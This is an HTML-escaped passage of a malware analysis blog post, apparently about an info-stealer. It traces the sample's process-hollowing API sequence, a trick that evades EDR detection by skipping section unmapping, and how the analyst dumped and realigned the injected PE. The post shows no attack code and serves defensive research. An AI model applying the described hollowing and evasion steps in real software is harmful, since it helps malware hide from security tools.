    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 80.20833333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAIAAACZeshMAAAACXBIWXMAAAsTAAALEwEAmpwYAAABMElEQVR42o2SCY6DMAxFOceQzXZolhK2qvT+NxsHqkyhVTOSJQL4+f+fpBFSlVIaOnRgSCmzl5T6teFUzQGW2qFz4CxcOrg49KCxlfLZIFQrnut90fDjpxX5RUgNpKnjKr8Po43RCGWhDDQ+hGEc8RK4WwHa2GPnNSE4PPAiM2BRMgzGWNQMp2FYH48upq1DGqRswQJFK07i77ZZeZwmcmH/atBKaXg2OGKpL7uV4Xi9zstSYI7Nwjssv5IZTkO6r+vTNqe2lidoMtl2Fe6H9JeZYWLbDAMG27ayAocYX20bysoKN9taV2DP8LyQL5kxZ97gf9hOnPmDbc5ct83nfF/vNvSHDUODvGGqphz7fp7nT5mxbjtfknGyPh7OmWFP79f7DF9TWm63Ahdl9FS1/Qt983eze2jkxgAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;advanced static analysis - Ghidra 1&quot; title=&quot;&quot; src=&quot;/website/static/25a24392bc56fea9a1db3960aabb1e0e/fdaf8/advanced%20static%20analysis%20-%20Ghidra%201.png&quot; srcset=&quot;/website/static/25a24392bc56fea9a1db3960aabb1e0e/804b2/advanced%20static%20analysis%20-%20Ghidra%201.png 384w,
/website/static/25a24392bc56fea9a1db3960aabb1e0e/fdaf8/advanced%20static%20analysis%20-%20Ghidra%201.png 674w&quot; sizes=&quot;(max-width: 674px) 100vw, 674px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;p&gt;Another notable section is &lt;code class=&quot;language-text&quot;&gt;.00cfg&lt;/code&gt;, whose uncommon name and contents raise suspicion. It includes a reference to the &lt;code class=&quot;language-text&quot;&gt;_guard_check_icall()&lt;/code&gt; function (it is associated with the &lt;code class=&quot;language-text&quot;&gt;/guard:cf&lt;/code&gt; compiler flag, for further information refer to &lt;a href=&quot;https://learn.microsoft.com/en-us/cpp/build/reference/guard-enable-control-flow-guard?view=msvc-170&quot;&gt;Microsoft Docs&lt;/a&gt;), which is linked to control flow integrity mechanisms that insert runtime checks on indirect calls. This would explain the unusually high number of cross-references observed in the disassembled code and reinforces the presence of protective or evasive techniques within the binary.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 687px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/095cbb31ae0e71b68e7ae4cfeaeda458/aec65/advanced%20static%20analysis%20-%20Ghidra%202.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 68.75%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAIAAACgpqunAAAACXBIWXMAAAsTAAALEwEAmpwYAAABQUlEQVR42o1SCW7EIAzMOwrYBnMmbJLd/v9vHdKq7R7SRhohcwwejz2pTzlUIgGYPVbr6CQmlVh8iRKjpCQpcDDO/V4b66wlAMG/mIwZ20k0UYh8YASaHP8kd8SinpgtMXkh9jhxDH3CqricRuJUJRUEEjNiEm+P5Hjqk+K1xFC3lnst21y2VTSIxkE2xhp7B3svGwo5eJDLWtttadedQ2DvkWN6soEfTsCXqPlSgLTkvLbYGvjkw/TW0oMccgezaEtl61oXA8HOnSKj8oKaLzX33G6r1hm1QeNZcrvOB7/Mn3ts3XzY0ef3w4BGBZ+G7Jx6huFaq6BV52tGwbFBQExL1drQ/JduvyJrQJ/KUXO99txXErH0IHsMoHsiD9lwC5rHOmd8UfadJEzsg+ZyuNK09VAWn9sD38kYz+/B/oOjL6guaXJd8+DkAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;advanced static analysis - Ghidra 2&quot; title=&quot;&quot; src=&quot;/website/static/095cbb31ae0e71b68e7ae4cfeaeda458/aec65/advanced%20static%20analysis%20-%20Ghidra%202.png&quot; srcset=&quot;/website/static/095cbb31ae0e71b68e7ae4cfeaeda458/804b2/advanced%20static%20analysis%20-%20Ghidra%202.png 384w,
/website/static/095cbb31ae0e71b68e7ae4cfeaeda458/aec65/advanced%20static%20analysis%20-%20Ghidra%202.png 687w&quot; sizes=&quot;(max-width: 687px) 100vw, 687px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;h2&gt;&lt;a id=&quot;dynamic-analysis-and-process-un-hollowing&quot;&gt;&lt;/a&gt;Dynamic analysis and process &quot;un-hollowing&quot;&lt;/h2&gt;
&lt;p&gt;Since static analysis proves ineffective due to the presence of obfuscation techniques, we shift our focus to dynamic analysis. This approach allows us to bypass the obfuscation layer and reach the core functionality hidden within the malware.&lt;/p&gt;
&lt;p&gt;One of the quickest and most efficient ways to gather behavioral insights with minimal manual effort is by using a sandbox environment. At Certego, we maintain a private instance of CAPE Sandbox. For this analysis, has proven to be an especially effective tool.&lt;/p&gt;
&lt;p&gt;Although the sandbox is internal and not accessible to the public, we can still share screenshots of the results to illustrate the malware&apos;s behavior.&lt;/p&gt;
&lt;div class=&quot;img-big&quot; align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/3a5e792ef8cfbc1821c5b09607604b25/a878e/dynamic%20analysis%20-%20capesandbox%201.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 53.385416666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAACqUlEQVR42j2R6U9TURDFiTEhuBGXGP9fjZooaLQCGk1cUJTYoKTiAnR7D2gJtLRQ7Pa68lopXWyhG+19P6cl8cPJzZ07c86Zc0eeT03xZPIRE5OTPHj4cIiJiYmzu5w2mw0jkyNqnhDJH7Nv1gmkTMKZGvFim3RVkSr3MSqK4jGMjF8a48qFUcavXOTmjWvcun6V8csXGBs9z+j5c9y8Ns76ZhC/CW7DYiXa4ZOewb5h8nndxBGs4oz3cCYhaFqM2N58Yfq9g6dv7czMOXhtX+Xl/C9efPzOzIcl3i2skilU0JNdPIlT3PEmjsABq79PcEZbuGJtvIkuXqNPuKgY+bqW4otgzhnikzPCvDuKXUswqC/oKZb8GfKlBlrybMgVawlhQcia/+ERQo+hCBWE8N7UHHenPnL72Vvu2Ga582SWu8/muD89P6w/fmXHyJfQjFM8yVOcsSZ2nwgFj/i1V2d5ryGu2/LWPyMMHFrslC20bJPtkkJ62PsL4apFUOrRusVhvYNu9NDTDIcXfFkc2yW+71QE5WFNk7dwUTL0yPS62HaHKmiRBv5UD7+42Ui00aW+nT6lWB3kJEj2ZOUmi9s5lqV3kKNXejURGzgMDxy6pahLBsu7h3jjLXxpi420Yl3W0+JdtrJ9irUOayKkZyxx0+HrpsmPUJWV/WNcA3epPt6UdeZwRQg94mQpkMS5e8SaWNeFdKDskmGfEBZqMhQ9EYGOOG3xc7eEL6PwZxliKC7uIwNCt1jVYh0WvTEW5Ve/Bcryi2V+StgeUfXlJENZOZQ4Jmy0iaS7BGMN9kUomreICSKZLnsSTa4khFt51NYByrVbVis7f5QrUlHu/YrS4w21me2rQL6nKo22ypVbKnvUUQe1npxtZdb6qlBniINqT+UFRyeof0e66hfQnShYAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;dynamic analysis - capesandbox 1&quot; title=&quot;&quot; src=&quot;/website/static/3a5e792ef8cfbc1821c5b09607604b25/71c1d/dynamic%20analysis%20-%20capesandbox%201.png&quot; srcset=&quot;/website/static/3a5e792ef8cfbc1821c5b09607604b25/804b2/dynamic%20analysis%20-%20capesandbox%201.png 384w,
/website/static/3a5e792ef8cfbc1821c5b09607604b25/e5715/dynamic%20analysis%20-%20capesandbox%201.png 768w,
/website/static/3a5e792ef8cfbc1821c5b09607604b25/71c1d/dynamic%20analysis%20-%20capesandbox%201.png 1536w,
/website/static/3a5e792ef8cfbc1821c5b09607604b25/a878e/dynamic%20analysis%20-%20capesandbox%201.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;p&gt;The image illustrates a classic case of &lt;strong&gt;process hollowing&lt;/strong&gt;, a technique widely used by modern malware to stealthily execute arbitrary code under the guise of a legitimate process. In the scenario depicted, the initial process corresponds to the malware itself which, at this early stage, has not yet exhibited any malicious behavior and therefore appears legitimate. The malware then creates a new instance of itself (a clone of the original executable process) launched explicitly in a suspended state. It is on this newly created process that the hollowing technique is applied: the original contents are overwritten with a malicious payload, which is later executed under the identity of what appears to be an unmodified and benign executable.&lt;/p&gt;
&lt;p&gt;The sequence begins with the creation of the suspended process using the high-level API &lt;code class=&quot;language-text&quot;&gt;CreateProcessW&lt;/code&gt;, which internally invokes the lower-level native API &lt;code class=&quot;language-text&quot;&gt;NtCreateUserProcess&lt;/code&gt;. The use of the &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/procthread/process-creation-flags&quot;&gt;CREATE_SUSPENDED flag (hex value 0x00000004)&lt;/a&gt; ensures that the primary thread of the process is created but not immediately executed. This provides a temporal window in which the attacker can modify the process&apos;s memory before any code is run. It is important to note that the order of the first three calls appears reversed due to how CAPE Sandbox logs API calls based on completion order rather than invocation order. Specifically, between &lt;code class=&quot;language-text&quot;&gt;NtCreateUserProcess&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;CreateProcessW&lt;/code&gt;, the &lt;code class=&quot;language-text&quot;&gt;sysenter&lt;/code&gt; instruction is observed. This instruction is used to transition directly from user mode to kernel mode and is internally employed by functions such as &lt;code class=&quot;language-text&quot;&gt;NtCreateUserProcess&lt;/code&gt; to perform system calls, enabling direct interaction with the Windows kernel.&lt;/p&gt;
&lt;p&gt;After the process has been created, the following operations are carried out:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;NtAllocateVirtualMemory&lt;/code&gt; is used to reserve memory space within the remote process (in this case at base address &lt;code class=&quot;language-text&quot;&gt;0x00400000&lt;/code&gt;, with a size of &lt;code class=&quot;language-text&quot;&gt;0x00059000&lt;/code&gt; bytes). Notably, the protection flags include &lt;code class=&quot;language-text&quot;&gt;PAGE_EXECUTE_READWRITE&lt;/code&gt;, which allows both writing and execution within the same region (a highly suspicious condition in legitimate software contexts).&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;WriteProcessMemory&lt;/code&gt; writes a malicious payload in Portable Executable (PE) format into the allocated memory. The data observed in the image clearly resembles a PE binary, beginning with the MZ magic number (&lt;code class=&quot;language-text&quot;&gt;0x4D5A&lt;/code&gt;), and appears to be injected in multiple non-contiguous segments.&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;NtGetContextThread&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;NtSetContextThread&lt;/code&gt; are then used to modify the execution context of the suspended thread, specifically &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-context-r2&quot;&gt;updating the value of the EIP&lt;/a&gt; (or &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-context&quot;&gt;RIP in 64-bit architectures&lt;/a&gt;) register, which represents the instruction pointer. This attribute of the &lt;code class=&quot;language-text&quot;&gt;CONTEXT&lt;/code&gt; struct is set to the entry point of the injected payload (&lt;code class=&quot;language-text&quot;&gt;0x0040ced0&lt;/code&gt;), so that execution resumes directly from the injected code rather than the original program logic.&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;NtResumeThread&lt;/code&gt; resumes the execution of the thread, effectively launching the malicious code under the identity of what appears to be a legitimate process.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The following image helps clarify why the child process is not explicitly unmapped during the hollowing procedure.&lt;/p&gt;
&lt;div class=&quot;img-big&quot; align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/886c84799542ae774125bf480ced3f38/cc6fe/dynamic%20analysis%20-%20capesandbox%202.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 45.052083333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAIAAAC9o5sfAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB2klEQVR42l2LzU4TYRSG5xpYaNsMg6PWn5jIXRAvQBNpqYnhEiDgTIvTpjHRUiCyQmsC1LiQBaCJGwQ7tEM71Y0bpLU6ndE2VqBA6WDn5/vx62eUxJMnb55zcl4GY4wQIlnSak9erj1bWptfkRdX5dTSWyrZxVfZ9OvcwnJmYWXzxZut/cP2vwpDjQSuH4H1zx35q5Ov4Y3S8fqOmdORYuBCjYCymqN8Q0TadveZNv6UqTWOofLFVjX7vQEz2/Vs+ejDd0ycAlTNKRqAiGn9V6b6owUy5c5mpZPX4cZ2Sy6ZqoEKOqUKcxVrS3PzVdi20GkZAOC6ACNQP7Qz5RPl426hbL771JB3DooGUnVX1QFJpdIpaG6xClu/AILABQBCyOC/Y7lo3wTNNmo6eM/CuxZuAnxAIbJnowbAPxFy8OkwT+fmIqIYlaSYKDwYHXkYCUuRcCQs3KcyMT4WFQVJGJfuCROxMTE+KkliPBqVRHE+lWJuDAx4eno4r5fz+TiW7WNZ9uwZn9fH9/Ze5vnzHk+/33+N5wn9F/zX+YtX+85d4vkrHBe6dZNJP08nJieT09PJqakuyeSjRCJBDjMzj2dn7w4PB4aGgqFQN++EBoPB24HAYLC7xuLx30zHiFdGMT+EAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;dynamic analysis - capesandbox 2&quot; title=&quot;&quot; src=&quot;/website/static/886c84799542ae774125bf480ced3f38/71c1d/dynamic%20analysis%20-%20capesandbox%202.png&quot; srcset=&quot;/website/static/886c84799542ae774125bf480ced3f38/804b2/dynamic%20analysis%20-%20capesandbox%202.png 384w,
/website/static/886c84799542ae774125bf480ced3f38/e5715/dynamic%20analysis%20-%20capesandbox%202.png 768w,
/website/static/886c84799542ae774125bf480ced3f38/71c1d/dynamic%20analysis%20-%20capesandbox%202.png 1536w,
/website/static/886c84799542ae774125bf480ced3f38/cc6fe/dynamic%20analysis%20-%20capesandbox%202.png 1860w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;p&gt;In this case, the malware performs process hollowing without invoking &lt;code class=&quot;language-text&quot;&gt;NtUnmapViewOfSection&lt;/code&gt; (the user-mode accessible syscall) or &lt;code class=&quot;language-text&quot;&gt;ZwUnmapViewOfSection&lt;/code&gt; (kernel-mode counterpart). The parent process, compiled with ASLR, is loaded at &lt;code class=&quot;language-text&quot;&gt;0x007c0000&lt;/code&gt;, leaving the typical base address &lt;code class=&quot;language-text&quot;&gt;0x00400000&lt;/code&gt; unused in the child. This allows a direct &lt;code class=&quot;language-text&quot;&gt;NtAllocateVirtualMemory&lt;/code&gt; call at &lt;code class=&quot;language-text&quot;&gt;0x00400000&lt;/code&gt;, avoiding the need to unmap any section. If that address had been occupied, the allocation would have failed.&lt;/p&gt;
&lt;p&gt;This technique cleverly bypasses EDRs that rely on detecting &lt;code class=&quot;language-text&quot;&gt;NtUnmapViewOfSection&lt;/code&gt; as a signature for hollowing. Later, a small memory region is mapped via &lt;code class=&quot;language-text&quot;&gt;NtMapViewOfSection&lt;/code&gt; at &lt;code class=&quot;language-text&quot;&gt;0x03460000&lt;/code&gt; and quickly unmapped with &lt;code class=&quot;language-text&quot;&gt;NtUnmapViewOfSectionEx&lt;/code&gt; (a variant that allows more granular unmapping by accepting a thread handle), possibly as a decoy. An analyst might dismiss this late unmap as harmless, missing the earlier stealthy injection. Nonetheless, further investigation would reveal the full evasion strategy.&lt;/p&gt;
&lt;p&gt;Following the sandbox analysis and identification of a process hollowing-compatible sequence, a &lt;a href=&quot;https://federicofantini.github.io/TheTrackerShow/scripts/x64dbg/01-lummastealer_process_unhollowing/&quot;&gt;script for x64dbg&lt;/a&gt; (as well as you can also find the console output) was developed to automate the tracing and memory dump of the injected payload. The script is designed to be executed once the breakpoint on the entry point of the analyzed process is reached, where the executable is loaded into memory but not yet executed.&lt;/p&gt;
&lt;p&gt;The script works on multiple levels. First, it defeats common anti-debugging countermeasures, including the &lt;code class=&quot;language-text&quot;&gt;BeingDebugged&lt;/code&gt; flag in the Process Environment Block (PEB) structure. Next, the script sets breakpoints on a set of strategic hollowing detection APIs: &lt;code class=&quot;language-text&quot;&gt;CreateProcessW&lt;/code&gt; (create the suspended process), &lt;code class=&quot;language-text&quot;&gt;VirtualAlloc&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;VirtualAllocEx&lt;/code&gt; (allocate memory in the remote process address space), &lt;code class=&quot;language-text&quot;&gt;WriteProcessMemory&lt;/code&gt; (write the payload), and &lt;code class=&quot;language-text&quot;&gt;ResumeThread&lt;/code&gt; (resume the thread after injection).&lt;/p&gt;
&lt;p&gt;Particular attention is paid to the &lt;code class=&quot;language-text&quot;&gt;WriteProcessMemory&lt;/code&gt; function. If a buffer containing the &lt;strong&gt;MZ signature&lt;/strong&gt; (indicator of the header of a PE file) is detected, the script assumes that it is the malicious payload injected into the hollowed process. In this case, the handle of the process in which the injection occurred is recorded. All subsequent writes to the same handle will be recorded.&lt;/p&gt;
&lt;p&gt;When &lt;code class=&quot;language-text&quot;&gt;ResumeThread&lt;/code&gt; is called, the script proceeds to hook the hollowed process through its Process ID, which was previously saved, and suspends execution to allow the analyst to manually dump the affected memory. I also tried to automate this step, but once the debugger hooks into the child process, &lt;a href=&quot;https://github.com/x64dbg/x64dbg/issues/3476&quot;&gt;it is no longer possible to execute commands in x64dbg except through the GUI console&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This approach allows to acquire the entire content of the injected payload before its execution, facilitating static analysis of the code and extraction of indicators of compromise.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;injected-memory-analysis&quot;&gt;&lt;/a&gt;Injected memory analysis&lt;/h2&gt;
&lt;p&gt;When extracting a Portable Executable (PE) file from a process&apos;s memory, the resulting dump often reflects the in-memory layout rather than the original structure on disk.&lt;/p&gt;
&lt;p&gt;This discrepancy occurs because, in memory, slices are aligned according to page boundaries (typically &lt;code class=&quot;language-text&quot;&gt;0x1000&lt;/code&gt; bytes), while on disk they follow file alignment (commonly &lt;code class=&quot;language-text&quot;&gt;0x200&lt;/code&gt; bytes). As a result, fields such as &lt;code class=&quot;language-text&quot;&gt;PointerToRawData&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;SizeOfRawData&lt;/code&gt; in slice headers may not accurately match their original values.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 444px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/7fb2d9384468f4d7a73bb4e3e84b7757/9b7bd/static%20analysis%20-%20PE-Bear%20PE%20format%20error.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 26.822916666666668%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAyklEQVR42o2P0W6DMAxF89H9r33DHiZVU1VtKkmAAmUdQ1XbEBsSg0ApM6027XFHjp1rXdmyiF7XH4fiq6qdc/O/uYXguk7MtyFMZpxCi9gynBDBwuOPgGxiAPBqDCAaY9gYQuARYrRP/rgimrWU2T7bJ6lWcaJ0rHRZHNI4TVScpdxUkVQykonW7KmrineIvssJtkPPDEsmIs+PnPPDonrv75qIJZ/WtHS27vN0PTcoAJzF3v4BlgDmR8NvvTTwlp+eN/LlPduVl2+RCRajZgz5xgAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;static analysis - PE-Bear PE format error&quot; title=&quot;&quot; src=&quot;/website/static/7fb2d9384468f4d7a73bb4e3e84b7757/9b7bd/static%20analysis%20-%20PE-Bear%20PE%20format%20error.png&quot; srcset=&quot;/website/static/7fb2d9384468f4d7a73bb4e3e84b7757/804b2/static%20analysis%20-%20PE-Bear%20PE%20format%20error.png 384w,
/website/static/7fb2d9384468f4d7a73bb4e3e84b7757/9b7bd/static%20analysis%20-%20PE-Bear%20PE%20format%20error.png 444w&quot; sizes=&quot;(max-width: 444px) 100vw, 444px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;p&gt;To reconstruct a valid PE file suitable for static analysis, these fields must be realigned, ensuring that the raw addresses and sizes match the virtual addresses and sizes observed in memory. This process, described in detail in &lt;a href=&quot;https://rufusmbrown.github.io/docs/posts/Aligning-Dumped-PE-File-from-Memory/&quot;&gt;Rufus M. Brown&apos;s blog post&lt;/a&gt;, involves modifying the PE headers to reflect the correct mappings, facilitating effective analysis of the dumped executable.&lt;/p&gt;
&lt;p&gt;As shown in the following image, I modified the address-related values within the “Section Hdrs” tab.&lt;/p&gt;
&lt;div class=&quot;img-big&quot; align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/87171d5517b4b3f658d2f1020625eb9c/0d292/static%20analysis%20-%20PE-Bear%20PE%20format%20error%20fix.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 32.03125%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAIAAABM9SnKAAAACXBIWXMAAAsTAAALEwEAmpwYAAABW0lEQVR42hXJWU/CMAAA4P10o+F0wBCNJ/EKamJ8ML4Y431FUQiQcHQbuK0tbGNH3SgbCKv6vX7ciPoDAykKkoaG5TqTIAjD8WQyjqIZY8zziAR7QMVdU9cdKwz+azoJ/jaK5txANzoSbLb6HwDLXwhjU4M2RA6E9jgITWNYroufDVTp4E4XYWQoiqVpjqbZhIw4VXYLwndBoHl+VC2ThxtzOUWEjLe+6hI3MPve9rqTz/p80n+6cytvZipOsry3knOhSjmMwuzyPJ1gsSVWrYSvz2F8MUrHo1Vh7tjUMOjG2iwdY7EF9ngfNmo0scT4BBP4OYZTTurauWI7vydmiqBSt+5fdH5LWdlHm0fI96e64a2VQPZASu2KD+96uaond0DuUC6UZNSnnD4goFn7EhtdUMNwKPdgS6xKvQaQm5T+WI53LV1cq6dX6nEbdYCiXPZObrWzO+Xc+ia/xnApa4XxWIEAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;static analysis - PE-Bear PE format error fix&quot; title=&quot;&quot; src=&quot;/website/static/87171d5517b4b3f658d2f1020625eb9c/71c1d/static%20analysis%20-%20PE-Bear%20PE%20format%20error%20fix.png&quot; srcset=&quot;/website/static/87171d5517b4b3f658d2f1020625eb9c/804b2/static%20analysis%20-%20PE-Bear%20PE%20format%20error%20fix.png 384w,
/website/static/87171d5517b4b3f658d2f1020625eb9c/e5715/static%20analysis%20-%20PE-Bear%20PE%20format%20error%20fix.png 768w,
/website/static/87171d5517b4b3f658d2f1020625eb9c/71c1d/static%20analysis%20-%20PE-Bear%20PE%20format%20error%20fix.png 1536w,
/website/static/87171d5517b4b3f658d2f1020625eb9c/0d292/static%20analysis%20-%20PE-Bear%20PE%20format%20error%20fix.png 1620w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;p&gt;Furthermore, by examining the “Optional Hdr” tab, we can observe that the DLL Characteristics field contains the value &lt;code class=&quot;language-text&quot;&gt;0x0040&lt;/code&gt;. This value corresponds to the &lt;code class=&quot;language-text&quot;&gt;IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE&lt;/code&gt; flag, which indicates that the binary supports Address Space Layout Randomization (ASLR). This security feature allows the operating system to load the executable at a randomized base address, making memory-based attacks more difficult by reducing predictability.&lt;/p&gt;
&lt;p&gt;However, in the context of malware analysis and reverse engineering, ASLR complicates debugging by randomizing the base addresses of executables and shared libraries at each execution. To maintain consistent memory layouts and simplify the analysis process, it is often necessary to disable ASLR during dynamic analysis sessions. This can be accomplished by using the &lt;code class=&quot;language-text&quot;&gt;editbin&lt;/code&gt; utility with the &lt;code class=&quot;language-text&quot;&gt;/DYNAMICBASE:NO&lt;/code&gt; option:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bat&quot;&gt;&lt;pre class=&quot;language-bat&quot;&gt;&lt;code class=&quot;language-bat&quot;&gt;editbin DYNAMICBASE:NO memdump_179C_00400000_59000.bin&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class=&quot;img-big&quot; align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1295px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/f2cb0091690d60fe9b26034349a15e31/610c0/static%20analysis%20-%20PE-Bear%20ASLR.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 39.583333333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAAAsTAAALEwEAmpwYAAABR0lEQVR42kWQy07EMAxF+///xIYlC8QGmKEwbZlKM5O0eTrOu8XhIa6iSLF1r4/TCSE451prSRJSKW2s/XnWunnvGWNiFcaYdVmpqLWhI6WiuwMP8zzfrjcAi4ghxPynfdtTTsrI4TQYirSGskIIpRTq0t1BgGma5vNZK3QQWj39iswxJ2lkf+xFE8aY8n8/ddbbYRg44wjeAfrgnXMU37JzoZrUon/rYwxK2NAGN8XYANvkcRw/Pk4YfCyZyB1AM5fiEW8Lo8mHlwMtHCJ5vWl/Yn/NLjiaPE2foHUQK2GXfUulNOx9DzkuShwPR84X8qQUa63lu9uwCex6uShr4TTau/v56YX3Q1xFAthzjgGlXIb+3QMsfDUGFy4AkJy0e/cTQwyKCzatb4/H/uEZpSXfhr4iVucKwAawMs2Yf30dzzMBbrXWL3TtxeMSAfLMAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
